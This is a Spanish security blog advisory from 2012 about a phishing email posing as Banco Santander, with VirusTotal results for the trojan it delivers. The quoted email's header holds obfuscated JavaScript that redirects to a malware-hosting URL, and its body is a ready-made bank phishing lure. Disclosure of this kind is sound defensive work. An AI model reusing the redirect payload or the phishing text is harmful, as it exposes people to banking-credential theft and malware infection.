Nuevo mail malicioso que aparenta venir del BANCO DE SANTANDER
Con una imagen similar a esta:
mail malicioso:
______________
Asunto: sistema de seguridad santander.
Fecha: Mon, 18 Jun 2012 10:32:17 +0300
De: <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:sat@satinfo.es”>sat@satinfo.es>
Banco Santander siempre trata de encontrar sus expectativas mas altas.
Por eso usamos la ultima tecnología en seguridad para nuestros clientes.
Por lo tanto nuestro departamento de anti fraude ha desarrollado un nuevo sistema de seguridad que elimine cualquier posibilidad del acceso de la tercera persona a sus datos, cuentas ni fondos.
Es obligatorio para todos los clientes usar este sistema de seguridad.
Para comenzar la descarga por favor pinche aquí:ACEPTAR
Nuestro consejo para usted es que introduzca sus datos se acceso para pasar La Verificación Del Sistema. Si la instalación no es realizado dentro de 48 Horas su cuenta sera suspendida temporalmente hasta que su registro sea completado.
Esto solo le va a costar unos minutos de su tiempo y va a tener una seguridad mucho mas estable.
© Santander .Todos los Derechos Reservados.
______________________
fin del mail malicioso
Hemos de decir que la descarga del fichero la realiza desde un servidor sito en España:
El servidor de descargas es de España :
79.148.245.97 ES Spain 29 Madrid Valdemoro 40.1890 -3.6757
El preanalisis de viorustotal del fichero descargado, ofrece el siguiente informe:
SHA256: 68d6bba7f66ef953f2b32af11f0b7d0ef8343548dee6757ad3da4e2b4ac670cb
SHA1: 0a3942dc1a19686aa37aed1426f8e4724f6e21e4
MD5: 130c0a75edf746fc3e583e345f020f13
Tamaño: 954.5 KB ( 977408 bytes )
Nombre: BCSANTANDER.exe
Tipo: Win32 EXE
Detecciones: 13 / 42
Fecha de análisis: 2012-06-18 15:23:09 UTC ( hace 1 minuto )
01Más detalles
Antivirus Resultado Actualización
AhnLab-V3 Trojan/Win32.Banker 20120618
AntiVir – 20120618
Antiy-AVL – 20120618
Avast Win32:Banker-JNM [Trj] 20120618
AVG – 20120618
BitDefender Gen:Variant.Zusy.1195 20120618
ByteHero – 20120618
CAT-QuickHeal – 20120616
ClamAV – 20120617
Commtouch – 20120618
Comodo UnclassifiedMalware 20120618
DrWeb – 20120618
Emsisoft Trojan-Banker.Win32.Banker!IK 20120618
eSafe – 20120617
F-Prot – 20120617
F-Secure Gen:Variant.Zusy.1195 20120618
Fortinet – 20120617
GData Gen:Variant.Zusy.1195 20120618
Ikarus Trojan-Banker.Win32.Banker 20120618
Jiangmin Trojan/Banker.Banker.nlr 20120618
K7AntiVirus – 20120615
Kaspersky – 20120618
McAfee Artemis!130C0A75EDF7 20120618
McAfee-GW-Edition Artemis!130C0A75EDF7 20120618
Microsoft – 20120618
NOD32 probably a variant of Win32/Spy.Banker.WUN 20120618
Norman – 20120618
nProtect – 20120618
Panda Trj/Banker.BSX 20120618
PCTools – 20120618
Rising – 20120618
Sophos – 20120618
SUPERAntiSpyware – 20120617
Symantec – 20120618
TheHacker – 20120618
TotalDefense – 20120618
TrendMicro – 20120618
TrendMicro-HouseCall – 20120618
VBA32 – 20120618
VIPRE – 20120618
ViRobot – 20120618
VirusBuster – 20120618
Dicho fichero pasa a ser controlado a partir del ELISTARA 25.71 de hoy, que estará disponible en nuestra web a partirn de las 19 h CEST de hoy
saludos
ms, 18-6-2012
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.